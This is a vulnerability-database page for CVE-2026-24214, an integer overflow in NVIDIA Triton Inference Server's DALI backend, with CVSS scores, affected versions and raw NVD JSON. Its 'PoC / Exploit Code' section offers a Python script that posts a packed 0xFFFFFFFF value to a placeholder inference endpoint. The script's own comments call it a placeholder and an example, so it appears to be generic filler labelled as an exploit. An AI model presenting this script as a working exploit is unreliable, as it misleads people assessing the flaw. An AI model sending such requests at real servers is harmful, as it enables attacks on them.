Security Vulnerability Report
中文
CVE-2026-24214 CVSS 8.0 HIGH

CVE-2026-24214

Published: 2026-05-20 04:16:47
Last Modified: 2026-05-20 17:14:00

Description

NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Triton Inference Server (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import struct # Target URL (Placeholder) target_url = "http://target-server:8000/infer" # Malicious payload designed to trigger integer overflow in DALI backend # This payload simulates a specific large input that causes the calculation error payload_data = struct.pack('<I', 0xFFFFFFFF) # Example large integer headers = { "Content-Type": "application/octet-stream" } try: # Send the malicious request # Interaction is required as per UI:R response = requests.post(target_url, data=payload_data, headers=headers) print(f"Response Status: {response.status_code}") except Exception as e: print(f"Exploit failed or server crashed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24214", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:47.173", "lastModified": "2026-05-20T17:13:59.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.03", "matchCriteriaId": "D5CC0AB5-9C28-4746-A0A0-D44CC1D43DF6"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24214", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5828", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24214", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}